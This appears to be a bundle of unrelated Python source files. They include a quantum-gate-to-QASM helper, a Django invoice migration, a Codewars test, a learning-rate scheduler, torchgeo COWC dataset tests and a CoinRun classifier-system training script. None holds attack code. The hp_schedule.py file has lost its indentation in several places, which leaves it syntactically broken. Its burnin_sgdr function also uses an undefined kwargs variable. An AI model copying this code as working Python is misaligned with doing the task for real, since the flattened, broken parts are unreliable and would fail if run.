                return 'Rz ' + str(2 * -change_domain(cmath.phase(matrix[0, 0]), new_domain=[0, 2 * np.pi]))
            elif isinstance(matrix[1, 0], complex):
                # Rx — NOTE(review): this test assumes Ry matrices arrive with a
                # real dtype; a complex-dtype Ry would be misdetected as Rx.
                return 'Rx ' + str(2 * change_domain(cmath.acos(matrix[0, 0]).real))
            else:
                # Ry
                return 'Ry ' + str(2 * change_domain(cmath.acos(matrix[0, 0]).real))
        elif matrix.shape == (4, 4):
            # Controlled R
            if np.count_nonzero(matrix - np.diag(np.diagonal(matrix))) == 0:
                # This checks if the matrix is diagonalized
                if matrix[0][0] == matrix[1][1] == matrix[2][2] == 1:
                    # This checks whether the first 3 diagonal entries are 1
                    polar_coords = cmath.polar(matrix[3][3])
                    if np.isclose(polar_coords[0], 1):
                        # Check whether r_coord equals 1
                        phi = polar_coords[1]
                        if np.isclose(phi, 0):
                            return 'CR ' + str(phi)
                        k = cmath.log(-(2 * cmath.pi) / phi, 2).real
                        if isinstance(k, int) or k.is_integer():
                            return 'CRk ' + str(int(k))
                        return 'CR ' + str(phi)
                    return 'Invalid generator'
            else:
                return 'Invalid generator'
    return 'Something went wrong'
def find_controlled_equivalent(operator, control_bits, qubit, nancillas, qubits):
    """Return QASM text implementing `operator` controlled on `control_bits`.

    Known gates are expanded directly via the lookup table below; anything
    else is delegated to U_to_CU for a recursive construction.

    NOTE(review): this function MUTATES `control_bits` in place (appends the
    ancilla index) for gates starting with 'C' or 'SWAP' — callers share that
    side effect; confirm it is intended before reusing the list.
    """
    if operator.startswith('C') or operator.startswith('SWAP'):
        control_bits.append(nancillas)
    controls_string = ', '.join(map(lambda c: f'q[{c}]', control_bits))
    # Split a parameterised gate ("Rx 0.5") into name/arg; sep[2] carries the
    # ',' separator so the reassembled call reads "Rx q[i], 0.5".
    if ' ' in operator:
        sep = operator.split(' ')
        sep.append(',')
    else:
        sep = [operator, '', '']
    # Direct expansions for singly-controlled forms of common gates.
    result = {
        'X': f'''CNOT {controls_string}, q[{qubit}]\n''',
        'Y': f'''Sdag q[{qubit}]\nCNOT {controls_string}, q[{qubit}]\nS q[{qubit}]\n''',
        'Z': f'''CZ {controls_string}, q[{qubit}]\n''',
        'CX': f'''Toffoli {controls_string}, q[{qubit}]\n''',
        'CY': f'''Sdag q[{qubit}]\nToffoli {controls_string}, q[{qubit}]\nS q[{qubit}]\n''',
        'CZ': f'''H q[{qubit}]\nToffoli {controls_string}, q[{qubit}]\nH q[{qubit}]\n''',
        'CNOT': f'''Toffoli {controls_string}, q[{qubit}]\n'''
    }.get(operator, 'Invalid')
    if result == 'Invalid':
        # Fall back to the generic controlled-U construction.
        if operator == 'Toffoli':
            result = U_to_CU(qubits, control_bits[0], nancillas, sep[0] + f' q[{nancillas}], q[{nancillas + 1}], q[{qubit}]' + f'\n')
        elif operator == 'SWAP':
            result = U_to_CU(qubits, control_bits[0], nancillas, sep[0] + f' q[{qubit}], q[{nancillas}]' + f'\n')
        else:
            result = U_to_CU(qubits, control_bits[0], nancillas, sep[0] + f' q[{qubit}]' + sep[2] + sep[1] + f'\n')
        if result == 'Invalid generator':
            raise Exception('Operator not supported yet! Operator: ' + operator)
    return result
|
<filename>polygon/invoice/migrations/0001_initial.py
# Generated by Django 3.0.6 on 2020-06-22 10:25
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
import django.utils.timezone
from django.conf import settings
from django.db import migrations, models
import polygon.core.utils.json_serializer
class Migration(migrations.Migration):
    """Auto-generated initial schema for the invoice app.

    Creates the Invoice and InvoiceEvent tables. Do not hand-edit generated
    field definitions; create a new migration instead.
    """

    initial = True
    dependencies = [
        ("order", "0085_delete_invoice"),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        # Invoice: metadata, status lifecycle, and a nullable link to an order.
        migrations.CreateModel(
            name="Invoice",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                (
                    "private_metadata",
                    django.contrib.postgres.fields.jsonb.JSONField(
                        blank=True,
                        default=dict,
                        encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
                        null=True,
                    ),
                ),
                (
                    "metadata",
                    django.contrib.postgres.fields.jsonb.JSONField(
                        blank=True,
                        default=dict,
                        encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
                        null=True,
                    ),
                ),
                (
                    "status",
                    models.CharField(
                        choices=[
                            ("pending", "Pending"),
                            ("success", "Success"),
                            ("failed", "Failed"),
                            ("deleted", "Deleted"),
                        ],
                        default="pending",
                        max_length=50,
                    ),
                ),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                ("updated_at", models.DateTimeField(auto_now=True)),
                ("number", models.CharField(max_length=255, null=True)),
                ("created", models.DateTimeField(null=True)),
                ("external_url", models.URLField(max_length=2048, null=True)),
                ("invoice_file", models.FileField(upload_to="invoices")),
                (
                    "order",
                    models.ForeignKey(
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="invoices",
                        to="order.Order",
                    ),
                ),
            ],
            options={"abstract": False,},  # noqa: E231
        ),
        # InvoiceEvent: audit trail of invoice lifecycle events.
        migrations.CreateModel(
            name="InvoiceEvent",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                (
                    "date",
                    models.DateTimeField(
                        default=django.utils.timezone.now, editable=False
                    ),
                ),
                (
                    "type",
                    models.CharField(
                        choices=[
                            ("requested", "The invoice was requested"),
                            (
                                "requested_deletion",
                                "The invoice was requested for deletion",
                            ),
                            ("created", "The invoice was created"),
                            ("deleted", "The invoice was deleted"),
                            ("sent", "The invoice has been sent"),
                        ],
                        max_length=255,
                    ),
                ),
                (
                    "parameters",
                    django.contrib.postgres.fields.jsonb.JSONField(
                        blank=True,
                        default=dict,
                        encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
                    ),
                ),
                (
                    "invoice",
                    models.ForeignKey(
                        blank=True,
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="events",
                        to="invoice.Invoice",
                    ),
                ),
                (
                    "order",
                    models.ForeignKey(
                        blank=True,
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="invoice_events",
                        to="order.Order",
                    ),
                ),
                (
                    "user",
                    models.ForeignKey(
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="+",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
            options={"ordering": ("date",),},  # noqa: E231
        ),
    ]
|
<reponame>aleattene/python-codewars-challenges
import unittest
from solution_pokemon_specials_contest import pk_special_winner
class PokemonSpecialsContest(unittest.TestCase):
    """Checks pk_special_winner against a table of known battle outcomes."""

    def test_solution(self):
        # (first, second, expected winner; -1 means no winner)
        cases = [
            (4, 14, 4),
            (71, 54, 71),
            (43, 44, -1),
            (83, 33, -1),
            (41, 45, 41),
            (5, 80, 80),
            (92, 51, 51),
            (27, 12, 12),
            (18, 72, -1),
            (17, 7, -1),
            (68, 6, 6),
            (60, 97, -1),
            (63, 74, -1),
            (81, 30, -1),
            (49, 37, 37),
            (24, 76, 76),
            (91, 82, 82),
            (34, 68, 34),
            (63, 51, -1),
            (90, 17, -1),
            (61, 65, -1),
            (31, 40, -1),
            (20, 3, -1),
            (58, 69, 58),
            (87, 65, -1),
            (92, 47, 92),
            (71, 66, 71),
            (9, 62, 62),
            (85, 17, -1),
            (1, 33, 33),
            (12, 13, 12),
            (52, 9, -1),
            (87, 14, -1),
            (33, 28, 28),
            (77, 52, -1),
            (19, 78, -1),
            (24, 89, -1),
            (72, 99, 72),
            (77, 18, -1),
            (25, 44, 44),
            (57, 51, -1),
            (60, 22, -1),
            (36, 65, -1),
            (98, 34, 98),
            (26, 12, 26),
            (51, 56, -1),
            (59, 94, -1),
            (70, 44, -1),
            (67, 13, 13),
            (31, 33, 31),
            (37, 85, -1),
            (3, 86, 3),
            (96, 71, 96),
            (93, 34, 34),
            (63, 99, -1),
            (69, 65, 65),
            (41, 8, -1),
            (13, 53, -1),
            (84, 35, -1),
            (73, 70, -1),
            (84, 70, 84),
            (72, 14, 72),
            (74, 22, 74),
            (61, 90, -1),
            (6, 46, 6),
            (58, 77, -1),
            (39, 46, -1),
            (79, 20, -1),
            (72, 68, 72),
            (80, 98, 80),
            (42, 97, 97),
            (26, 19, -1),
            (65, 35, -1),
            (12, 65, 12),
            (35, 49, -1),
            (58, 89, -1),
            (18, 67, 18),
            (75, 69, 69),
            (2, 4, 4),
            (83, 49, 83),
            (11, 57, -1),
            (56, 87, 56),
            (33, 17, -1),
            (79, 96, 79),
            (33, 4, -1),
            (80, 77, 80),
            (52, 57, 57),
            (68, 26, -1),
            (9, 38, 9),
            (99, 42, -1),
            (61, 86, -1),
            (51, 22, 22),
            (21, 77, -1),
            (32, 26, -1),
            (73, 47, 73),
            (29, 92, 92),
            (7, 37, 7),
            (12, 63, 12),
            (53, 88, -1),
            (34, 60, 60),
        ]
        # Plain loop (no subTest) keeps the original fail-fast behavior.
        for first, second, expected in cases:
            self.assertEqual(pk_special_winner(first, second), expected)
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
|
#!/usr/bin/env python
"""
hp_schedule.py
Optimizer hyperparameter scheduler
!! Most of the schedulers could be reimplemented as compound schedules (prod or cat)
"""
from __future__ import print_function, division
import sys
import copy
import warnings
import numpy as np
from tqdm import tqdm
import torch
from torch import nn
from torch.nn import functional as F
from torch.autograd import Variable
# --
# Helpers
def power_sum(base, k):
    """Closed-form geometric series: base**0 + base**1 + ... + base**k."""
    numerator = base ** (k + 1) - 1
    return numerator / (base - 1)
def inv_power_sum(x, base):
    """Inverse of power_sum: recover k such that power_sum(base, k) == x."""
    shifted = x * (base - 1) + 1
    return np.log(shifted) / np.log(base) - 1
def linterp(x, start_x, end_x, start_y, end_y):
    """Linearly interpolate y at x on the segment (start_x, start_y)-(end_x, end_y)."""
    fraction = (x - start_x) / (end_x - start_x)
    return start_y + fraction * (end_y - start_y)
def _set_hp(optimizer, hp_name, hp_hp):
num_param_groups = len(list(optimizer.param_groups))
if isinstance(hp_hp, float):
hp_hp = [hp_hp] * num_param_groups
else:
assert len(hp_hp) == num_param_groups, ("len(%s) != num_param_groups" % hp_name)
for i, param_group in enumerate(optimizer.param_groups):
param_group[hp_name] = hp_hp[i]
def maybe_warn_kwargs(kwargs):
    """Warn (RuntimeWarning) when unused keyword arguments were passed through."""
    if not kwargs:
        return
    warnings.warn("\n\nHPSchedule: unused arguments:\n %s \n\n" % str(kwargs), RuntimeWarning)
# --
class HPSchedule(object):
@staticmethod
def set_hp(optimizer, hp):
for hp_name, hp_hp in hp.items():
_set_hp(optimizer, hp_name, hp_hp)
@staticmethod
def constant(hp_max=0.1, **kwargs):
maybe_warn_kwargs(kwargs)
def f(progress):
return hp_max
return f
@staticmethod
def step(hp_max=0.1, breaks=(150, 250), factors=(0.1, 0.1), epochs=None, repeat=True):
""" Step function learning rate annealing """
assert len(breaks) == len(factors)
breaks = np.array(breaks)
def f(progress):
if repeat:
progress = progress % epochs
return hp_max * np.prod(factors[:((progress >= breaks).sum())])
return f
@staticmethod
def linear(hp_max=0.1, epochs=None, repeat=True):
assert epochs is not None, "epochs is None"
def f(progress):
""" Linear learning rate annealing """
if repeat:
progress = progress % epochs
return hp_max * (epochs - progress) / epochs
return f
@staticmethod
def cyclical(hp_max=0.1, epochs=None, period_length=1, repeat=True):
assert epochs is not None, "epochs is None"
return HPSchedule.prod_schedule([
HPSchedule.stepify(HPSchedule.linear(epochs=epochs, hp_max=hp_max, repeat=repeat)),
HPSchedule.linear(epochs=period_length, hp_max=1, repeat=True),
])
@staticmethod
def linear_cycle(*args, **kwargs):
raise Exception('!! Renamed to one_cycle')
@staticmethod
def one_cycle(hp_add=0.095, epochs=10, hp_init=0.0, hp_final=0.005, extra=5):
def f(progress):
if progress < epochs / 2:
return 2 * (hp_final + hp_add) * (1 - (epochs - progress) / epochs)
elif progress <= epochs:
return hp_final + 2 * hp_add * (epochs - progress) / epochs
elif progress <= epochs + extra:
return hp_final * (extra - (progress - epochs)) / extra
else:
return hp_final / 10
return f
@staticmethod
def piecewise_linear(breaks, vals):
assert len(breaks) == len(vals)
def _f(progress):
if progress < breaks[0]:
return vals[0]
for i in range(1, len(breaks)):
if progress < breaks[i]:
return linterp(progress, breaks[i - 1], breaks[i], vals[i - 1], vals[i])
return vals[-1]
def f(x):
if isinstance(x, list) or isinstance(x, np.ndarray):
return [_f(xx) for xx in x]
else:
return _f(x)
return f
@staticmethod
def sgdr(hp_max=0.1, period_length=50, hp_min=0, t_mult=1):
def f(progress):
""" SGDR learning rate annealing """
if t_mult > 1:
period_id = np.floor(inv_power_sum(progress / period_length, t_mult)) + 1
offsets = power_sum(t_mult, period_id - 1) * period_length
period_progress = (progress - offsets) / (t_mult ** period_id * period_length)
else:
period_progress = (progress % period_length) / period_length
return hp_min + 0.5 * (hp_max - hp_min) * (1 + np.cos(period_progress * np.pi))
return f
@staticmethod
def burnin_sgdr(hp_init=0.1, burnin_progress=0.15, burnin_factor=100):
sgdr = HPSchedule.sgdr(hp_init=hp_init, **kwargs)
def f(progress):
""" SGDR learning rate annealing, w/ constant burnin period """
if progress < burnin_progress:
return hp_init / burnin_factor
else:
return sgdr(progress)
return f
@staticmethod
def exponential_increase(hp_init=0.1, hp_max=10, num_steps=100):
mult = (hp_max / hp_init) ** (1 / num_steps)
def f(progress):
return hp_init * mult ** progress
return f
# --
# Compound schedules
@staticmethod
def stepify(fn):
def f(progress):
progress = np.floor(progress)
return fn(progress)
return f
@staticmethod
def prod_schedule(fns):
def f(progress):
return np.prod([fn(progress) for fn in fns], axis=0)
return f
@staticmethod
def cat_schedule(fns, breaks):
# !! Won't work w/ np.arrays
assert len(fns) - 1 == len(breaks)
def f(progress):
assert (isinstance(progress, float) or isinstance(progress, int))
if progress < breaks[0]:
return fns[0](progress)
for i in range(1, len(breaks)):
if progress < breaks[i]:
return fns[i - 1](progress)
return fns[-1](progress)
return f
# --
# HP Finder
class HPFind(object):
    """Learning-rate finder: sweep LR exponentially and watch the loss."""

    @staticmethod
    def find(model, dataloaders, hp_init=1e-5, hp_max=10, hp_mults=None,
            params=None, mode='train', smooth_loss=False):
        """Run one epoch with exponentially increasing LR and record (lr, loss).

        The model is deep-copied first so the caller's weights are untouched.
        Stops early once the loss exceeds 4x the best loss seen so far.
        Returns (lr_history, loss_history) with the last (diverged) point
        dropped. NOTE(review): assumes `model` exposes deepcopy/init_optimizer/
        set_progress/train_batch/hp — a project-specific wrapper, not a plain
        nn.Module; confirm against the caller.
        """
        assert mode in dataloaders, '%s not in loader' % mode
        # --
        # Setup HP schedule
        if model.verbose:
            print('HPFind.find: copying model', file=sys.stderr)
        model = model.deepcopy()
        _ = model.train()
        if hp_mults is not None:
            # Per-param-group multipliers scale both ends of the sweep.
            hp_init *= hp_mults
            hp_max *= hp_mults  # Correct?
        hp_scheduler = HPSchedule.exponential_increase(
            hp_init=hp_init, hp_max=hp_max, num_steps=len(dataloaders[mode])
        )
        if params is None:
            params = filter(lambda x: x.requires_grad, model.parameters())
        model.init_optimizer(
            opt=torch.optim.SGD,
            params=params,
            hp_scheduler={
                "lr": hp_scheduler
            },
            momentum=0.9,
        )
        # --
        # Run epoch of training w/ increasing learning rate
        avg_mom = 0.98  # For smooth_loss (EMA momentum)
        avg_loss = 0.  # For smooth_loss (EMA accumulator)
        hp_hist, loss_hist = [], []
        gen = enumerate(dataloaders[mode])
        if model.verbose:
            gen = tqdm(gen, total=len(dataloaders[mode]), desc='HPFind.find:')
        for batch_idx, (data, target) in gen:
            model.set_progress(batch_idx)
            loss, _ = model.train_batch(data, target)
            if smooth_loss:
                # Bias-corrected exponential moving average of the loss.
                avg_loss = avg_loss * avg_mom + loss * (1 - avg_mom)
                debias_loss = avg_loss / (1 - avg_mom ** (batch_idx + 1))
                loss_hist.append(debias_loss)
            else:
                loss_hist.append(loss)
            if model.verbose:
                gen.set_postfix(**{
                    "loss": loss,
                })
            hp_hist.append(model.hp['lr'])
            # Divergence guard: stop once loss blows up past 4x the minimum.
            if loss > np.min(loss_hist) * 4:
                break
        return np.vstack(hp_hist[:-1]), loss_hist[:-1]

    @staticmethod
    def get_optimal_hp(hp_hist, loss_hist, c=10, burnin=5):
        """
        For now, gets smallest loss and goes back an order of magnitude (c).
        Maybe it'd be better to use the point w/ max slope? Or not use smoothed estimate?

        NOTE(review): assumes hp_hist rows are array-like (len() is taken
        below), matching find()'s np.vstack output — confirm if called with
        plain floats.
        """
        # Drop the first `burnin` points: early losses are noisy.
        hp_hist, loss_hist = hp_hist[burnin:], loss_hist[burnin:]
        min_loss_idx = np.array(loss_hist).argmin()
        min_loss_hp = hp_hist[min_loss_idx]
        opt_hp = min_loss_hp / c
        if len(opt_hp) == 1:
            opt_hp = opt_hp[0]
        return opt_hp
if __name__ == "__main__":
from rsub import *
from matplotlib import pyplot as plt
# Step
# hp = HPSchedule.step(hp_max=np.array([1, 2]), factors=(0.5, 0.5), breaks=(10, 20), epochs=30)
# hps = np.vstack([hp(i) for i in np.arange(0, 30, 0.01)])
# _ = plt.plot(hps[:,0])
# _ = plt.plot(hps[:,1])
# show_plot()
# Linear
# hp = HPSchedule.linear(epochs=30, hp_max=0.1)
# hps = np.vstack([hp(i) for i in np.arange(0, 30, 0.01)])
# _ = plt.plot(hps)
# show_plot()
# # Linear cycle
# hp = HPSchedule.one_cycle(epochs=30, hp_max=0.1, extra=10)
# hps = np.vstack([hp(i) for i in np.arange(0, 40, 0.01)])
# _ = plt.plot(hps)
# show_plot()
# Piecewise linear
# vals = [
# np.array([0.1, 0.5, 1.0]) * 0.0,
# np.array([0.1, 0.5, 1.0]) * 1.0,
# np.array([0.1, 0.5, 1.0]) * 0.5,
# ]
# hp = HPSchedule.piecewise_linear(breaks=[0, 0.5, 1], vals=vals)
# hps = np.vstack([hp(i) for i in np.arange(-1, 2, 0.01)])
# _ = plt.plot(hps[:,0])
# _ = plt.plot(hps[:,1])
# _ = plt.plot(hps[:,2])
# show_plot()
# Cyclical
# hp = HPSchedule.cyclical(epochs=30, hp_max=0.1)
# hps = np.vstack([hp(i) for i in np.arange(0, 40, 0.01)])
# _ = plt.plot(hps)
# show_plot()
# SGDR
# hp = HPSchedule.sgdr(period_length=10, t_mult=2, hp_max=np.array([1, 2]))
# hps = np.vstack([hp(i) for i in np.arange(0, 70, 0.01)])
# _ = plt.plot(hps[:,0])
# _ = plt.plot(hps[:,1])
# show_plot()
# # Product
# hp = HPSchedule.prod_schedule([
# HPSchedule.stepify(HPSchedule.linear(epochs=30, hp_max=0.1)),
# HPSchedule.linear(epochs=1, hp_max=1),
# ])
# hps = np.vstack([hp(i) for i in np.arange(0, 30, 0.01)])
# _ = plt.plot(hps)
# show_plot()
# exponential increase (for setting learning rates)
# hp = HPSchedule.exponential_increase(hp_init=np.array([1e-5, 1e-4]), hp_max=10, num_steps=100)
# hps = np.vstack([hp(i) for i in np.linspace(0, 100, 1000)])
# _ = plt.plot(hps[:,0])
# _ = plt.plot(hps[:,1])
# _ = plt.yscale('log')
# show_plot()
|
<filename>tests/datasets/test_cowc.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import shutil
from pathlib import Path
from typing import Generator
import pytest
import torch
from _pytest.fixtures import SubRequest
from _pytest.monkeypatch import MonkeyPatch
from torch.utils.data import ConcatDataset
import torchgeo.datasets.utils
from torchgeo.datasets import COWCCounting, COWCDetection
from torchgeo.datasets.cowc import COWC
from torchgeo.transforms import Identity
def download_url(url: str, root: str, *args: str, **kwargs: str) -> None:
    """Test stub for torchgeo's download_url: copy a local fixture into root.

    Extra positional/keyword arguments are accepted (to match the real
    signature) and ignored.
    """
    source = url
    shutil.copy(source, root)
class TestCOWC:
    """Sanity check on the abstract COWC base class."""

    def test_not_implemented(self) -> None:
        # The abstract base must not be instantiable directly.
        with pytest.raises(TypeError, match="Can't instantiate abstract class"):
            COWC()  # type: ignore[abstract]
class TestCOWCCounting:
    """Tests for the COWCCounting dataset against local fixture files."""

    @pytest.fixture(params=["train", "test"])
    def dataset(
        self,
        monkeypatch: Generator[MonkeyPatch, None, None],
        tmp_path: Path,
        request: SubRequest,
    ) -> COWC:
        """Build a COWCCounting instance backed by tests/data fixtures.

        Network download is replaced by a local file copy, and the checksum
        list is patched to match the fixture archives.
        """
        monkeypatch.setattr(  # type: ignore[attr-defined]
            torchgeo.datasets.utils, "download_url", download_url
        )
        base_url = os.path.join("tests", "data", "cowc_counting") + os.sep
        monkeypatch.setattr(  # type: ignore[attr-defined]
            COWCCounting, "base_url", base_url
        )
        # md5s of the fixture archives (not the real dataset).
        md5s = [
            "fd44e49492d63e9050e80d2157813263",
            "c44f6d709076562116b1a445ea91a228",
            "405d33d745a850c3a0c5e84713c5fd26",
            "3bd99854a243218fe40ea11dd552887f",
            "5648852da4212876502c7a454e70ce8e",
            "f91460b2e7dcfbad53f5f5ede05f2da2",
            "9d26d6c4bca7c6e932b0a6340647af8b",
            "ccc18c4ac29a13ad2bcb293ff6be69fe",
        ]
        monkeypatch.setattr(COWCCounting, "md5s", md5s)  # type: ignore[attr-defined]
        root = str(tmp_path)
        split = request.param
        transforms = Identity()
        return COWCCounting(root, split, transforms, download=True, checksum=True)
    def test_getitem(self, dataset: COWC) -> None:
        # Samples are dicts of tensors.
        x = dataset[0]
        assert isinstance(x, dict)
        assert isinstance(x["image"], torch.Tensor)
        assert isinstance(x["label"], torch.Tensor)
    def test_len(self, dataset: COWC) -> None:
        assert len(dataset) == 12
    def test_add(self, dataset: COWC) -> None:
        # Datasets support + via torch's ConcatDataset.
        ds = dataset + dataset
        assert isinstance(ds, ConcatDataset)
        assert len(ds) == 24
    def test_already_downloaded(self, dataset: COWC) -> None:
        # Re-instantiating with download=True must not re-download.
        COWCCounting(root=dataset.root, download=True)
    def test_out_of_bounds(self, dataset: COWC) -> None:
        with pytest.raises(IndexError):
            dataset[12]
    def test_invalid_split(self) -> None:
        with pytest.raises(AssertionError):
            COWCCounting(split="foo")
    def test_not_downloaded(self, tmp_path: Path) -> None:
        with pytest.raises(RuntimeError, match="Dataset not found or corrupted."):
            COWCCounting(str(tmp_path))
class TestCOWCDetection:
    """Tests for the COWCDetection dataset against local fixture files."""

    @pytest.fixture
    def dataset(
        self, monkeypatch: Generator[MonkeyPatch, None, None], tmp_path: Path
    ) -> COWC:
        """Build a COWCDetection instance backed by tests/data fixtures."""
        monkeypatch.setattr(  # type: ignore[attr-defined]
            torchgeo.datasets.utils, "download_url", download_url
        )
        base_url = os.path.join("tests", "data", "cowc_detection") + os.sep
        monkeypatch.setattr(  # type: ignore[attr-defined]
            COWCDetection, "base_url", base_url
        )
        # md5s of the fixture archives (not the real dataset).
        md5s = [
            "dd8725ab4dd13cf0cc674213bb09e068",
            "37619fce32dbca46d2fd96716cfb2d5e",
            "405d33d745a850c3a0c5e84713c5fd26",
            "3bd99854a243218fe40ea11dd552887f",
            "5648852da4212876502c7a454e70ce8e",
            "f91460b2e7dcfbad53f5f5ede05f2da2",
            "9d26d6c4bca7c6e932b0a6340647af8b",
            "ccc18c4ac29a13ad2bcb293ff6be69fe",
        ]
        monkeypatch.setattr(COWCDetection, "md5s", md5s)  # type: ignore[attr-defined]
        root = str(tmp_path)
        split = "train"
        transforms = Identity()
        return COWCDetection(root, split, transforms, download=True, checksum=True)
    def test_getitem(self, dataset: COWC) -> None:
        # Samples are dicts of tensors.
        x = dataset[0]
        assert isinstance(x, dict)
        assert isinstance(x["image"], torch.Tensor)
        assert isinstance(x["label"], torch.Tensor)
    def test_len(self, dataset: COWC) -> None:
        assert len(dataset) == 12
    def test_add(self, dataset: COWC) -> None:
        ds = dataset + dataset
        assert isinstance(ds, ConcatDataset)
        assert len(ds) == 24
    def test_already_downloaded(self, dataset: COWC) -> None:
        COWCDetection(root=dataset.root, download=True)
    def test_out_of_bounds(self, dataset: COWC) -> None:
        with pytest.raises(IndexError):
            dataset[12]
    def test_invalid_split(self) -> None:
        with pytest.raises(AssertionError):
            COWCDetection(split="foo")
    def test_not_downloaded(self, tmp_path: Path) -> None:
        with pytest.raises(RuntimeError, match="Dataset not found or corrupted."):
            COWCDetection(str(tmp_path))
|
<reponame>cx1027/coinrun_twoobjects<gh_stars>0
"""
Train an agent using a PPO2 based on OpenAI Baselines.
"""
import time
from mpi4py import MPI
import random
from coinrun import setup_utils, make
import tensorflow as tf
from baselines.common import set_global_seeds
import coinrun.main_utils as utils
# from coinrun.import setup_utils, policies, wrappers, ppo2
from coinrun.config import Config
from MOXCS import moxcs
import csv
# from coinrun.Mask_RCNN.csci_e89_project import det
import numpy.random
import pandas as pd
# from sympy.combinatorics import graycode
# import xcs
import gym
import matplotlib.pyplot as plt
import numpy as np
from gym import wrappers
import pickle
import numpy.random
import MOXCS.XCSmountainGym
from MOXCS.moeadMethod import moeadMethod
# from sympy.combinatorics.graycode import GrayCode
# from getCondition import getCondition
"""
An implementation of an N-bit multiplexer problem for the X classifier system
"""
num_envs=1
#The number of bits to use for the address in the multiplexer, 3 bit in example
bits = 1
#The maximum reward
rho = 1000
env_seed = '1'
#paper experiment
# learning_problems = 260
# validation_problems = 30
# interval = 20
#debug
learning_problems = 501
validation_problems = 5
interval = 10
nenvs=1
# arg_strs = setup_utils.setup_and_load()
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# env = utils.make_general_env(nenvs, seed=5)
#parameters
"""
Returns a random state of the mountainCar
"""
# pos_space = np.linspace(-1.2, 0.6, 12) #12 11
# vel_space = np.linspace(-0.07, 0.07, 20) #20 19
# action_space = [0, 1, 2]
#列行
# Hand-enumerated walkable [column, row] cells of the two training mazes.
# NOTE(review): some rows are listed in descending column order (e.g.
# [12,3],[11,3],[10,3]) — presumably the enumeration order matters to the
# consumer; confirm before normalising.
maze1= [
    [1,1],
    [2,1],
    [3,1],
    [4,1],
    [1,2],
    [2,2],
    [3,2],
    [4,2],
    [1,3],
    [2,3],
    [3,3],
    [4,3],
    [5,3],
    [6,3],
    [7,3],
    [8,3],
    [12,3],
    [11,3],
    [10,3],
    [1,4],
    [2,4],
    [3,4],
    [4,4],
    [5,4],
    [6,4],
    [7,4],
    [8,4],
    [9,4],
    [16,4],
    [15,4],
    [14,4],
    [13,4],
    [12,4],
    [11,4],
    [10,4],
    [1,5],
    [2,5],
    [3,5],
    [4,5],
    [5,5],
    [6,5],
    [7,5],
    [8,5],
    [9,5],
    [16,5],
    [15,5],
    [14,5],
    [13,5],
    [12,5],
    [11,5],
    [10,5],
    [1,6],
    [2,6],
    [3,6],
    [4,6],
    [5,6],
    [6,6],
    [7,6],
    [8,6],
    [9,6],
    [16,6],
    [15,6],
    [14,6],
    [13,6],
    [12,6],
    [11,6],
    [10,6],
    [1,7],
    [2,7],
    [3,7],
    [4,7],
    [5,7],
    [6,7],
    [7,7],
    [8,7],
    [9,7],
    [16,7],
    [15,7],
    [14,7],
    [13,7],
    [12,7],
    [11,7],
    [10,7],
    [1,8],
    [2,8],
    [3,8],
    [4,8],
    [5,8],
    [6,8],
    [7,8],
    [8,8],
    [9,8],
    [10,8],
    [11,8],
    [12,8],
    [13,8],
    [14,8],
    [15,8],
    [16,8]
]
# Smaller maze used for the second curriculum stage.
maze2= [
    [1,1],
    [2,1],
    [3,1],
    [4,1],
    [1,2],
    [2,2],
    [3,2],
    [4,2],
    [1,3],
    [2,3],
    [3,3],
    [4,3],
    [4,4],
    [5,4],
    [7,4],
    [8,4],
    [4,5],
    [5,5],
    [6,5],
    [7,5],
    [8,5],
    [9,5]
]
# def state():
# return ''.join(['0' if numpy.random.rand() > 0.5 else '1' for i in range(0, bits + 2**bits)])
# Shared mutable flag used by reward() to signal episode termination.
interm = {'done':False}
# seed = 5
import logging
# create logger with 'spam_application'
logger = logging.getLogger('moxcsnonGym')
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler('./data/moxcsnonGym.log')
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - ## %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
# set_global_seeds(seed)
# def getstate(observation):
#     pos, vel = observation
#     pos_bin = int(np.digitize(pos, pos_space))
#     vel_bin = int(np.digitize(vel, vel_space))
#     return stateToCondition_gray(pos_bin,vel_bin)
def stateToCondition_binary(pos_bin, vel_bin):
    """Encode two bin indices into one 10-bit condition string (5 bits each)."""
    return '{:05b}'.format(pos_bin) + '{:05b}'.format(vel_bin)
# def stateToCondition_gray(pos_bin,vel_bin):
# left_gray = GrayCode(5)
# right_gray = GrayCode(5)
# left_binary = '{:05b}'.format(pos_bin)
# right_binary = '{:05b}'.format(vel_bin)
# left_gray = graycode.bin_to_gray(left_binary)
# right_gray = graycode.bin_to_gray(right_binary)
# condition = left_gray + right_gray
# return condition
#todo: matrix(1024 1024 3) to coindition
# def stateToCondition(matrix):
# left = getInformation(0)
# right = getInformation(1)
# up = getInformation(2)
# down = getInformation(3)
# return left+right+up+down
#todo:get information from matrix
# class InferenceConfig(det.DetConfig):
# # Set batch size to 1 since we'll be running inference on
# # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
# GPU_COUNT = 1
# IMAGES_PER_GPU = 1
# inf_config = InferenceConfig('obj', ['obj','player_obj', 'monster_obj', 'step_obj', 'wall_obj'])
